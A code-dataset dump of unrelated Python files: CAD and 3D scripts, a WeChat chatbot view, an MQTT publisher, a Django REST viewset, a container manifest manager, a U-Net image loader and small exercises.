- getAngles.Z())))\n\n\n obj.SetWorldRotation(rotateValue_X)\n obj.SetWorldRotation(rotateValue_Y)\n obj.SetWorldRotation(rotateValue_Z)\n\nfor obj in MaxPlus.SelectionManager.Nodes:\n\n SetRotation(obj, 0, -50, 0)\n\n\n # if obj.Name == 'camera':\n # getAngle = Quaternion_toEulerianAngle(obj.GetWorldRotation().X, obj.GetWorldRotation().Y, obj.GetWorldRotation().Z, obj.GetWorldRotation().W)\n #\n # translateValue = MaxPlus.Point3(0, 0, 0)\n #\n # obj.SetWorldPosition(translateValue)\n #\n\n\n","sub_path":"CamCleaner.py","file_name":"CamCleaner.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"311429736","text":"n = int(input())\r\na = n\r\ns = 0\r\nwhile(n>0):\r\n temp = n % 10\r\n c = 1\r\n for i in range(1,temp+1):\r\n c = c * i\r\n s = s + c\r\n n = n // 10\r\nif (s == a):\r\n print('strong number')\r\nelse:\r\n print('not strong number')\r\n \r\n","sub_path":"strong number.py","file_name":"strong number.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"350998326","text":"from __future__ import print_function\n\nimport logging\nimport numpy as np\nimport timeit\n\nfrom OCC.Core.BRep import BRep_Builder, BRep_Tool\nfrom OCC.Core.BRepTools import breptools_Read\nfrom OCC.Core.Geom import Geom_Line, Geom_TrimmedCurve\nfrom OCC.Core.GeomConvert import geomconvert_SurfaceToBSplineSurface\nfrom OCC.Core.GeomAPI import GeomAPI_ExtremaCurveSurface\nfrom OCC.Core.gp import gp_Pnt, gp_Dir\nfrom OCC.Core.TopoDS import TopoDS_Shape, topods_Face\nfrom OCC.Display.SimpleGui import init_display\n\nlogging.getLogger('matplotlib').setLevel(logging.ERROR)\n\n\ndef trimmed_curve_from_points(points=[[0.9, 0.9, 0.9]], vecs=[[1, 1, 0]]):\n \"\"\"\n Create line objects from points/vectors\n \"\"\"\n return [Geom_TrimmedCurve(Geom_Line(gp_Pnt(*p), gp_Dir(*vec)), 0., 8.)\n for p, vec in zip(points, vecs)]\n\n\ndef show_objects(objs=[], wireframe=False):\n \"\"\"\n Display pythonOCC geometry objects in simple viewer\n\n Parameters\n ----------\n objs : list\n List of pythonOCC objects to be displayed\n wireframe : bool\n Set to true to plot wireframe instead of surface\n \"\"\"\n display, start_display, add_menu, add_function_to_menu = init_display(size=(1920, 1080))\n display.EraseAll()\n if wireframe:\n display.SetModeWireFrame()\n for obj in objs:\n display.DisplayShape(obj, update=True)\n start_display()\n\n\ndef read_brep(filename):\n \"\"\"\n Retrieve BSpline surface from brep file\n \"\"\"\n output_shape = TopoDS_Shape()\n builder = BRep_Builder()\n breptools_Read(output_shape, filename, builder)\n brep_face = BRep_Tool.Surface(topods_Face(output_shape))\n return geomconvert_SurfaceToBSplineSurface(brep_face)\n\n\ndef generate_intersection_vectors(c, nxu=100, nxv=10):\n \"\"\"\n Generate the intersection vectors\n \"\"\"\n x = np.linspace(0.01*c, 1.99*c, nxu)\n vec_phi = np.linspace(0, 2*np.pi, nxv)\n points = np.pad(x[:, None], ((0, 0), (0, 2)), mode='constant')\n vecs = np.column_stack([np.zeros(nxv), np.cos(vec_phi), np.sin(vec_phi)])\n points, vecs = np.broadcast_arrays(points[:, None, :], vecs[None, ...])\n return points.reshape(-1, 3), vecs.reshape(-1, 3)\n\n\ndef intersect(occsurf, occvecs, v, show_occ=False):\n '''\n Perform intersection\n '''\n occpts = []\n xpts = []\n fails = []\n times = []\n for curve, v_1, v_2 in zip(occvecs, *v):\n failure = [np.nan, np.nan, np.nan]\n t = timeit.timeit(lambda: GeomAPI_ExtremaCurveSurface(curve, occsurf, 0., 1., 0., 1., 0., 1.),\n number=1)\n x = GeomAPI_ExtremaCurveSurface(curve, occsurf, 0., 6., 0., 1., 0., 1.)\n w, _, _ = x.LowerDistanceParameters()\n times.append(t)\n vec = curve.Value(w)\n if x.LowerDistance() > 1e-4:\n failure = np.array([vec.X(), vec.Y(), vec.Z()])\n occpts.append(vec)\n xpts.append(np.array([vec.X(), vec.Y(), vec.Z()]))\n fails.append(failure)\n\n if show_occ:\n show_objects([occsurf] + occvecs + occpts)\n\n print('----------')\n print('Time for intersections', sum(times))\n\n xpts = np.array(xpts)\n fails = np.array(fails)\n isfailure = np.any(~np.isnan(fails), axis=1)\n fails = fails[isfailure]\n\n return times, isfailure, xpts\n\n\ndef write_vtk_output(surface, times, isfailure, xpts, pts, vecs):\n import vtkhelpers\n from occhelpers.geom import OCCBSplineSurface\n\n OCCBSplineSurface.from_raw_object(surface).to_interpol_bspline_surface().to_vtk().write('surf')\n vtklines = vtkhelpers.multiple_lines_from_grids(np.dstack((pts,\n pts + vecs * 8)))\n\n data = {'id': np.arange(len(pts)),\n 'failure': isfailure.astype(int).ravel(),\n 'runtime': np.array(times),\n }\n\n xverts = vtkhelpers.vertices_from_grids(xpts.T)\n xverts.point_data.update(data)\n xverts.write('xpoints')\n\n vtklines.cell_data.update(data)\n vtklines.write('lines')\n\n\nif __name__ == \"__main__\":\n import pytest\n pytest.main(['test_intersection_example.py', '-sv'])\n","sub_path":"intersection_example.py","file_name":"intersection_example.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"538352146","text":"import paho.mqtt.client as mqtt\n\n# 1. MQTT 클라이언트 객체 인스턴스화\nclient = mqtt.Client()\n\ntry:\n # 2. 브로커 연결\n client.connect(\"localhost\")\n\n # 3. 토픽 메시지 발행\n client.publish(\"iot/home2/greet\", \"Hello World!\")\n client.loop(2)\n\nexcept Exception as err:\n print('에러 : &s'%err)","sub_path":"MQTT.python/pub.py","file_name":"pub.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"392062270","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.http.response import HttpResponse, HttpResponseBadRequest\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom wechat_sdk import WechatBasic\nfrom wechat_sdk.exceptions import ParseError\nfrom wechat_sdk.messages import TextMessage\nfrom service.models import userdialog\nimport time\nfrom service.tuling import sendtuling\n\nWECHAT_TOKEN = 'mahhhraspberrypi'\nAppID = 'wx0a69695d0ecfc941'\nAppSecret = ''\n\n# 实例化 WechatBasic\nwechat_instance = WechatBasic(\n token=WECHAT_TOKEN,\n appid=AppID,\n appsecret=AppSecret\n)\n\n\n@csrf_exempt\ndef index(request):\n if request.method == 'GET':\n # 检验合法性\n # 从 request 中提取基本信息 (signature, timestamp, nonce, xml)\n signature = request.GET.get('signature')\n timestamp = request.GET.get('timestamp')\n nonce = request.GET.get('nonce')\n\n if not wechat_instance.check_signature(\n signature=signature, timestamp=timestamp, nonce=nonce):\n return HttpResponseBadRequest('Verify Failed')\n\n return HttpResponse(\n request.GET.get('echostr', ''), content_type=\"text/plain\")\n\n # 解析本次请求的 XML 数据\n try:\n wechat_instance.parse_data(data=request.body)\n except ParseError:\n return HttpResponseBadRequest('Invalid XML Data')\n\n # 获取解析好的微信请求信息\n message = wechat_instance.get_message()\n # 获取来源用户OpenID\n userid = message.source\n # 会话超时判断\n userid = str(userid)\n try:\n dialog = userdialog.objects.get(userid=userid)\n except:\n dialog = userdialog.objects.create(userid = userid,lasttime = int(time.time()),tulingflag = 0,jokingstep = 0)\n if (int(time.time()) - dialog.lasttime) > 180:\n dialog.tulingflag = 0\n dialog.jokingstep = 0\n else:\n pass\n response = None\n # 关注事件的默认回复\n if message.type == 'subscribe':\n response = wechat_instance.response_text(\n content=(\n '感谢您的关注!\\n回复【功能】两个字查看支持的功能'\n ))\n # 文字内容的回复\n elif isinstance(message, TextMessage):\n # 当前会话内容\n content = message.content.strip()\n reply_text = (\n '好委屈,我没有听懂哦😝'\n )\n if dialog.tulingflag == 1:\n if content == '退出':\n dialog.tulingflag = 0\n reply_text = (\n '已退出聊天模式'\n )\n else:\n tuling_chat = sendtuling(content,str(userid))\n reply_text = (\n tuling_chat\n )\n else:\n if content == '功能':\n reply_text = (\n '目前支持的功能:\\n1、回复【二八轮动】可以搜索数据,查看最新指数情况\\n'\n '2、回复【陪我聊天】,查天气,陪聊天,讲故事,你的小伙伴【小小某】无所不能!'\n '还有更多好玩和实用的功能正在开发中哦 ^_^'\n # '\\n【<a href=\"https://www.mahhh.imwork.net\">马某个人主页</a>】'\n )\n elif content == '二八轮动':\n reply_text = (\n '实时观测深沪300指数与创业板指数变化\\n'\n '还有更多好玩和实用的功能正在开发中哦 ^_^\\n'\n '【<a href=\"http://www.mahh.xin/lundong\">点我查看</a>】'\n '\\n【<a href=\"http://39.106.8.229/lundong\">备用地址</a>】'\n # '\\n【<a href=\"https://www.douban.com/note/551791040/\">了解更多</a>】'\n )\n elif content == '陪我聊天':\n dialog.tulingflag = 1\n reply_text = (\n '人工智能的【小小某】已开启陪聊模式😎'\n '\\n如果您想要退出聊天模式,请回复【退出】'\n '\\n(本功能基于<a href=\"http://www.tuling123.com/\">图灵机器人</a>开发)'\n '\\n还有更多好玩和实用的功能正在开发中哦 ^_^'\n )\n else:\n tuling_chat = sendtuling(content, str(userid))\n reply_text = (\n tuling_chat\n )\n\n # elif content.endswith('教程'):\n # reply_text = '您要找的教程如下:'\n\n response = wechat_instance.response_text(content=reply_text)\n # 非文字内容回复\n else:\n response = wechat_instance.response_text(\n content=(\n '哎呀,我现在只会读文字啊😥'\n )\n )\n dialog.lasttime = int(time.time())\n dialog.save()\n return HttpResponse(response, content_type=\"application/xml\")\n","sub_path":"service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"249541128","text":"import os\nimport bpy\nfrom bpy.app.handlers import persistent\n\nbl_info = {\n \"name\": \"OBJ Export on Save\",\n \"blender\": (2, 81, 0),\n \"category\": \"Process\",\n}\n\ntargetDir = '/path/to/p5live/models/'\n\n\n@persistent\ndef export_as_obj(dummy):\n filename = os.path.splitext(os.path.basename(bpy.data.filepath))\n targetFilePath = targetDir + filename[0] + '.obj'\n print('exporting obj to:', targetFilePath)\n\n bpy.ops.export_scene.obj(\n filepath=targetFilePath,\n check_existing=False,\n # axis_forward='-Z',\n # axis_up='Y',\n # use_selection=True,\n # use_animation=False,\n # use_mesh_modifiers=True,\n # use_edges=True,\n # use_smooth_groups=False,\n # use_smooth_groups_bitflags=False,\n # use_normals=True,\n # use_uvs=True,\n # use_materials=True,\n # use_triangles=False,\n # use_nurbs=False,\n # use_vertex_groups=False,\n # use_blen_objects=True,\n # group_by_object=False,\n # group_by_material=False,\n # keep_vertex_order=False,\n # global_scale=1,\n # path_mode='AUTO'\n )\n\n\ndef register():\n print(\"Hello World\")\n if not export_as_obj in bpy.app.handlers.save_post:\n bpy.app.handlers.save_post.append(export_as_obj)\n\n\ndef unregister():\n print(\"Goodbye World\")\n if export_as_obj in bpy.app.handlers.save_post:\n bpy.app.handlers.save_post.remove(export_as_obj)\n\n\n# This allows you to run the script directly from Blender's Text editor\n# to test the add-on without having to install it.\nif __name__ == \"__main__\":\n register()\n","sub_path":"Blender-Export-To-OBJ-Addon.py","file_name":"Blender-Export-To-OBJ-Addon.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"570318048","text":"#-*- coding:utf-8 -*-\n__author__ = 'sunweiwei002'\nfrom common.getconfig import GetConfig\nfrom common.verify import Verify\nfrom nose.plugins.attrib import attr\nfrom common.requestslib import RequestsLib\nfrom assistant.hhub3.order import Order\nfrom common.getdate import GetDate\n\n@attr('addfororder','hhub3')\nclass Testaddfororder():\n @classmethod\n def setup_class(self):\n date = GetDate()\n self.hotelId = \"2000014\"\n self.order = Order(date.get_date(0), date.get_date(1), hotelId=self.hotelId)\n self.orderId = self.order.get_orderId()\n self.conf = GetConfig()\n self.verity=Verify()\n self.url = self.conf.get_conf_value(\"hhub3\",\"url\")+r\"api/Invoice/AddForOrder\"\n self.requestslib = RequestsLib()\n\n @classmethod\n def teardown_class(self):\n self.order.cancel_order(self.orderId)\n pass\n\n def testaddfororder_status(self):\n u\"添加发票到订单\"\n params = dict()\n params['hotelId'] = self.hotelId\n params['orderId'] = self.orderId\n params['Invoices.Title'] ='盟广信息技术(上海)有限公司'\n params['Invoices.Content'] ='吃喝玩乐'\n params['Invoices.Type'] ='0'\n params['Invoices.IsDefault'] ='true'\n params['Invoices.IsVat'] ='true'\n params['Invoices.TaxpayerCode'] = '12345687890'\n params['Invoices.UnifiedSocialCreditCode'] = '1234567890'\n params['Invoices.CompanyAddress'] = '紫秀路100号'\n params['Invoices.PhoneNumber'] = '02180236666'\n params['Invoices.CompanyBank'] = '工商银行'\n params['Invoices.CompanyBankAccountNumber'] = '1234567890'\n response = self.requestslib.send_request_by_alltoken('post', self.url, request_body=params)\n self.verity.by_status(response, 200)","sub_path":"testproject/hhub3/invoice/addfororder/testaddfororder.py","file_name":"testaddfororder.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"563264670","text":"import nltk\nimport string\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom nltk.stem.porter import PorterStemmer\n\npath = '/opt/datacourse/data/parts'\ntoken_dict = {}\nstemmer = PorterStemmer()\n\n\ndef stem_tokens(tokens, stemmer):\n stemmed = []\n for item in tokens:\n stemmed.append(stemmer.stem(item))\n return stemmed\n\ndef tokenize(text):\n tokens = nltk.word_tokenize(text)\n stems = stem_tokens(tokens, stemmer)\n return stems\n\nvectorizer = TfidfVectorizer(tokenizer=tokenize, stop_words='english')\n\n#this can take some time\n\ndef preprocess(text):\n lowers = text.lower()\n no_punctuation = lowers.translate(None, string.punctuation)\n return no_punctuation\n\n\ndef similarity(text1, text2):\n text1 = preprocess(text1)\n text2 = preprocess(text2)\n tfidf = vectorizer.fit_transform([text1, text2])\n return ((tfidf * tfidf.T).A)[0,1]\n\n# calculate the value of novelty of single sentence of s1 compared with the array of sentences ss.\ndef novelty(s1, ss):\n max = 0\n for s in ss:\n sim = similarity(s, s1)\n if sim > max:\n max = sim\n return 1 - max\n","sub_path":"Novelty.py","file_name":"Novelty.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"359387783","text":"import forca\nimport adivinhacao\n\ndef escolhe_jogo():\n print(\"*********************************\")\n print(\"******* Escolha Seu Jogo ********\")\n print(\"*********************************\")\n\n print(\"(1) Forca (2) Adivinhação\")\n\n jogo = int(input(\"Qual jogo: \"))\n\n if(jogo == 1):\n print(\"Jogando Forca\")\n forca.jogar_forca()\n else:\n print(\"Jogando Advinhação\")\n adivinhacao.jogar_adivinhacao()\n\nif(__name__== \"__main__\"):\n escolhe_jogo()\n","sub_path":"jogos.py","file_name":"jogos.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"222773696","text":"from toposort import toposort_flatten\nfrom .cached_property import cached_property\nimport os\nimport json\n\n\ndef trim_interface_name(name):\n if len(name) >= 15:\n return name[0:15]\n return name\n\n\nclass Container:\n def __init__(self, name):\n self.name = name\n\n @classmethod\n def all(cls):\n def exists(name):\n return name == os.path.basename(name) \\\n and os.path.exists(os.path.join(\"/var/lib/machines\", name, 'fs'))\n\n machines = sorted(os.listdir('/var/lib/machines'))\n machines = list(filter(exists, machines))\n return (cls(name) for name in machines)\n\n @cached_property\n def manifest(self):\n try:\n with open('/var/lib/machines/{}/manifest'.format(self.name)) as f:\n return json.loads(f.read())\n except FileNotFoundError:\n return {\n \"kostkaVersion\": \"0.0.2\",\n \"name\": self.name,\n \"dependencies\": [\n {\"imageName\": \"debian-jessie\"}\n ],\n \"networks\": [\n {\"type\": \"bridge\",\n \"bridge\": \"br-lan\",\n \"host\": trim_interface_name(\"vb-{}-lan\".format(self.name)),\n \"guest\": \"host0\"},\n ]\n }\n\n @manifest.setter\n def manifest(self, manifest):\n with open('/var/lib/machines/{}/manifest'.format(self.name), 'w') as f:\n f.write(json.dumps(manifest, indent=2))\n return manifest\n\n @property\n def dependencies(self):\n return list(dependency['imageName'] for dependency in self.manifest['dependencies'])\n\n @dependencies.setter\n def dependencies(self, dependencies):\n manifest = self.manifest\n manifest['dependencies'] = list({\"imageName\": name} for name in dependencies)\n self.manifest = manifest\n\n def mount_lowerdirs(self):\n # First, build a dependency graph in order to avoid duplicate entries\n dependencies = {}\n pending_deps = set(self.dependencies)\n while len(pending_deps) > 0:\n name = pending_deps.pop()\n if name not in dependencies:\n dependencies[name] = set(Container(name).dependencies)\n pending_deps |= dependencies[name]\n\n # Then sort it topologically. The list is reversed, because overlayfs\n # will check the mounts in order they are given, so the base fs has to\n # be the last one.\n dependencies = reversed(list(toposort_flatten(dependencies)))\n return ':'.join('/var/lib/machines/{}/overlay.fs'.format(dep) for dep in dependencies)\n\n @property\n def networks(self):\n return self.manifest.get('networks', [\n {\"type\": \"bridge\",\n \"bridge\": \"br-lan\",\n \"host\": trim_interface_name(\"vb-{}-lan\".format(self.name)),\n \"guest\": \"host0\"\n },\n ])\n\n @property\n def bridges(self):\n return list(filter(lambda net: net['type'] == 'bridge', self.networks))\n\n def add_network(self, bridge, host=None, guest=None, mac=None):\n manifest = self.manifest\n if not host:\n host = \"vb-{}-{}\".format(self.name, bridge.split('-', 1)[1])\n if not guest:\n guest = \"host-{}\".format(bridge.split('-', 1)[1])\n\n if mac:\n mac = '{}:{}:{}:{}:{}:{}'.format(mac[0:2], mac[2:4], mac[4:6], mac[6:8], mac[8:10], mac[10:12])\n\n if any(filter(lambda net: net['host'] == host, self.networks)):\n raise ValueError('Duplicate host interface name: ' + host)\n\n if any(filter(lambda net: net['guest'] == guest, self.networks)):\n raise ValueError('Duplicate container interface name: ' + guest)\n\n if any(filter(lambda net: net.get('guest_address', '') == mac, self.networks)):\n raise ValueError('Duplicate guest mac address: ' + mac)\n\n if len(host) > 15:\n raise ValueError('Host interface name {} is {} bytes too long.'.format(host, len(host) - 15))\n\n if len(guest) > 15:\n raise ValueError('Container interface name {} is {} bytes too long.'.format(guest, len(guest) - 15))\n\n manifest['networks'].append({\n \"type\": \"bridge\",\n \"bridge\": bridge,\n \"host\": host,\n \"guest\": guest,\n })\n\n if mac:\n manifest['networks'][-1]['guest_address'] = mac\n\n self.manifest = manifest\n","sub_path":"kostka/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"317498487","text":"# Wrong Answer\n# Python 3\n\n# Enter your code here. Read input from STDIN. Print output to STDOUT\n'''\nclass Node:\n def __init__(self,info): \n self.info = info \n self.left = None \n self.right = None \n \n\n // this is a node of the tree , which contains info as data, left , right\n'''\ndef height(root, p=0, maxim=-1):\n\n if root:\n if root.left:\n p = height(root.left, p+1, maxim)\n p -= 1\n if root.right:\n p = height(root.right, p+1, maxim)\n\n if p>maxim:\n maxim = p\n\n if not root:\n return maxim\n return p\n\n","sub_path":"scrapeHackerrankCode/codes/tree-height-of-a-binary-tree225.py","file_name":"tree-height-of-a-binary-tree225.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"411105440","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author:Abel\nimport json\nfrom modules.shell_modules import MyRPCShell\nfrom modules.random_modules import MyRPCMd5\n\n\nclass MyFabric(MyRPCShell,MyRPCMd5):\n\n def __init__(self, command):\n \"\"\"\n MyFabric的构造方法\n :param command: 传入命令\n \"\"\"\n self.command = command # 命令\n self.group = {} # 所有组\n self.hosts = [] # 所有用户\n with open(\"../conf/hosts.conf\",\"r\") as file:\n for line in file:\n info = line.strip()\n if info.startswith(\"[\"): # 以[开头,表示为组名\n group = info.strip(\"[]\")\n # 表示将组名作为key传入到self.group字典内,并定义他为一个列表\n self.group[group] = []\n else:\n # info数据为[ip]\n # 将info加入到self.hosts列表\n if info :\n self.hosts.append(info)\n # 将info加入到各自的组\n self.group[group].append(info)\n\n def myrpc_command(self):\n \"\"\"\n 通过用户输入的参数,来调用相应的方法\n :return:\n \"\"\"\n try:\n method_name = \"myrpc_%s\" % (self.command[1]) # 方法名\n except:\n print(\"myrpc.py: [host|group|shell|help]\") # 不存在则打印出用法\n return False\n if hasattr(self, method_name): # 通过反射寻找方法\n method = getattr(self, method_name) # 找到方法则get下来赋值\n method() # 执行方法\n else:\n print(\n \"myrpc.py: [host|group|shell|help]\") # 如果没有找到方法,则打印出用法\n return False\n\n def myrpc_host(self):\n \"\"\"\n 此方法将所有所有的主机IP和端口输出至控制台\n :return:\n \"\"\"\n print(\"ID\\tIP\")\n for host in enumerate(self.hosts):\n id = host[0]\n ip = host[1]\n print(\"%s\\t%s\" % (id, ip))\n return True\n\n def myrpc_group(self):\n \"\"\"\n 此方法将所有的组名输出至控制台\n :return:\n \"\"\"\n print(\"ID\\tName\")\n for group in enumerate(self.group):\n id = group[0]\n name = group[1]\n print(\"%s\\t%s\" % (id, name))\n return True\n\n def myrpc_help(self):\n \"\"\"\n 此方法为帮助,将所有用法输出至控制台\n :return:\n \"\"\"\n help_content=\"\"\"\n myrpc.py [host|group|shell|help]\n\n help 帮助\n\n host 列出所有主机\n\n group 列出所有组\n\n shell 执行shell命令,后面需要接--host或者--group\n 格式为:myrpc.py shell [--host=‘IP’|--group='组名'] --cmd='shell命令'\n\n\n --host [shell] --host='IP'\n\n --group [shell] --group='组名'\n\n --cmd --cmd='shell命令'\n\n \"\"\"\n print(help_content)\n\n\n\ndef run_func(cmd):\n server = MyFabric(cmd) # 定义对象,并传入参数\n server.myrpc_command() # 执行myrpc_command方法","sub_path":"day11/myrpc/service/modules/myrpc_modules.py","file_name":"myrpc_modules.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"35737746","text":"from simtools.Analysis.BaseAnalyzers import BaseAnalyzer\n\n\nclass SimulationDirectoryMapAnalyzer(BaseAnalyzer):\n \"\"\"\n Analyzer allowing the user to retrieve data for each experiments containing:\n | Sim ID | Tags | Path |\n\n We do not need any select_simulation_data in this analyzer as all the data we need can be\n found in the simulation objects. Therefore only a finalize method is used.\n \"\"\"\n\n def __init__(self):\n super().__init__(need_dir_map=True)\n\n def finalize(self, all_data: dict) -> dict:\n \"\"\"\n Will go through every keys of the `all_data` parameters (the simulation objects) and construct the return\n dictionary by extracting the id, tags and physical path.\n\n Args:\n all_data: simulation -> selected data (here NONE)\n\n Returns:\n Dictionary associating experiment_id -> [{id:\"\", tag_1:\"\", tag_2:\"\", path:\"\"}, {...}]\n\n \"\"\"\n results = {}\n\n for simulation in all_data.keys():\n if simulation.experiment_id not in results:\n results[simulation.experiment_id] = []\n\n # Add the simulation to the results\n results[simulation.experiment_id].append({\n \"id\": simulation.id,\n **simulation.tags,\n \"path\": simulation.get_path()\n })\n\n return results\n\n","sub_path":"simtools/Analysis/BaseAnalyzers/SimulationDirectoryMapAnalyzer.py","file_name":"SimulationDirectoryMapAnalyzer.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"104285072","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\n\nfrom rest_framework.authentication import SessionAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom .serializer import BookSerializer\nfrom books.models import Book, Category, Author\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\n\nclass BookViewset(viewsets.ModelViewSet):\n # authentication_classes = [SessionAuthentication]\n # permission_classes = [IsAuthenticated] # checks auth; if OK|=> perform_create starts\n serializer_class = BookSerializer\n lookup_field = 'slug'\n queryset = Book.objects.all()\n\n # def create /perform_create: extra layer of validation ( excl duble; type or like that\n\n def create(self, request):\n \"\"\" create (basic req.data ) vs perform_create (no req.data;suitable for custom-n)\n and has serialiser\"\"\"\n data = request.data\n category_id = data.get('category_id')\n category = get_object_or_404(Category, id=category_id)\n owner_id = data.get('owner_id')\n owner = get_object_or_404(User, id=owner_id)\n price = data.get('price')\n title = data.get('title')\n desc = data.get('description')\n authors = data.get('authors') # list [{'name': 'Mulya'}]\n new_book = Book.objects.create(\n owner=owner, category=category, title=title, description=desc, price=price\n )\n list_authors = []\n for person in authors:\n for n,name_val in person.items():\n if Author.objects.filter(name=name_val).exists():\n found_author = get_object_or_404(Author,name=name_val)\n new_book.authors.add(found_author)\n else:\n new_author = Author.objects.create(name=name_val)\n new_book.add(new_author)\n new_book.save()\n serializer = BookSerializer(new_book)\n return Response(serializer.data)\n\n # def perform_create(self, serializer):\n # \"\"\" create (basic req.data ) vs perform_create (no req.data;suitable for custom-n)\n # and has serialiser\"\"\"\n # req_data = self.request.data\n # #serializer.validated_data: title,descr-n,price; no trace of FK or m2m\n # data = serializer.validated_data\n # category_id = req_data.get('category_id')\n # # category_id = data.get('category_id') # here None\n # category = get_object_or_404(Category, id=category_id)\n # print(\"found cat\", category)\n # owner_id = req_data.get('owner_id')\n # owner = get_object_or_404(User, id=owner_id)\n # print(\"found owner\", owner)\n # author_id = req_data.get('author_id')\n # author = get_object_or_404(Author,id=author_id)\n # # serializer.save(owner=owner, category=category)\n # print(\"It's done ....\")\n\n\n\n","sub_path":"api/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"285592634","text":"import jinja2, os.path\nfrom models.post import Post\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\ndef get_template(name):\n\treturn JINJA_ENVIRONMENT.get_template(name)\n\nimport re\nfrom jinja2 import evalcontextfilter, Markup, escape\n\n_paragraph_re = re.compile(r'(?:\\r\\n|\\r|\\n){2,}')\n\n@evalcontextfilter\ndef nl2br(eval_ctx, value):\n result = u'\\n\\n'.join(u'<p>%s</p>' % p.replace('\\n', '<br>\\n')\n for p in _paragraph_re.split(escape(value)))\n\n result = result.replace(Post.seperator, '<hr>')\n if eval_ctx.autoescape:\n result = Markup(result)\n return result\t\n\n@evalcontextfilter\ndef img2tags(eval_ctx, value):\n import re\n result = re.sub(r'\\$IMG:([0-9a-zA-Z\\.-]+)', '<a href=\"/image/\\\\1?fullsize=1\" target=\"_blank\"><img src=\"/image/\\\\1\"/></a>', value)\n\n if eval_ctx.autoescape:\n result = Markup(result)\n return result\n\n\nJINJA_ENVIRONMENT.filters['nl2br'] = nl2br \nJINJA_ENVIRONMENT.filters['img2tags'] = img2tags ","sub_path":"templates/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"373114840","text":"#\n# load.py : utils on generators / lists of ids to transform from strings to\n# cropped images and masks\n\nimport os\n\nimport numpy as np\nfrom PIL import Image\nimport cv2\nfrom Projects.FLL_flaw_detection.segmentation.Unet.utils.utils import resize_and_crop, get_square, normalize, hwc_to_chw\nfrom Projects.FLL_flaw_detection.segmentation.Unet.augmentation import augmentation\n\ndef squeeze(mask):\n if len(mask.shape) ==3:\n mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)\n mask = mask.astype(np.float32)\n if np.max(mask)==255:\n mask /= 255.0\n return mask[..., np.newaxis]\n\n\ndef to_cropped_imgs(ids, dir, isize):\n \"\"\"From a list of tuples, returns the correct cropped img\"\"\"\n for id in ids:\n im = resize_and_crop(Image.open(os.path.join(dir, id)), isize=isize)\n yield im\n\n\ndef get_imgs_and_masks(ids, dir, isize=448, aug=True):\n \"\"\"Return all the couples (img, mask)\"\"\"\n\n imgs = to_cropped_imgs(ids, dir, isize)\n\n # need to transform from HWC to CHW\n if aug:\n imgs = map(augmentation, imgs)\n imgs_switched = map(hwc_to_chw, imgs)\n imgs_normalized = map(normalize, imgs_switched)\n ids_mask = [name.replace('.', '_mask.') for name in ids]\n\n masks = to_cropped_imgs(ids_mask, dir, isize)\n masks_squeezed = map(squeeze, masks)\n masks_switched = map(hwc_to_chw, masks_squeezed)\n if aug:\n gen = map(augmentwithmask, zip(imgs_normalized, masks_switched))\n else:\n gen = zip(imgs_normalized, masks_switched)\n return gen\n\n\ndef get_full_img_and_mask(id, dir_img, dir_mask):\n im = Image.open(dir_img + id + '.png')\n mask = Image.open(dir_mask + id + '.png')\n return np.array(im), np.array(mask)\n\n\ndef augmentwithmask(inputs):\n flip_code = np.random.randint(-1, 3)\n img, mask = inputs\n if flip_code != 2:\n img = cv2.flip(img, flip_code)\n mask = cv2.flip(mask, flip_code)\n return img, mask","sub_path":"TrainerDL/Projects/FLL_flaw_detection/segmentation/Unet/utils/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"266006202","text":"class InputComment(object):\n def __init__(self, event_id, sample_id, construct_id, current_call,\n user, date, comment):\n self.event_id = event_id\n self.sample_id = sample_id\n 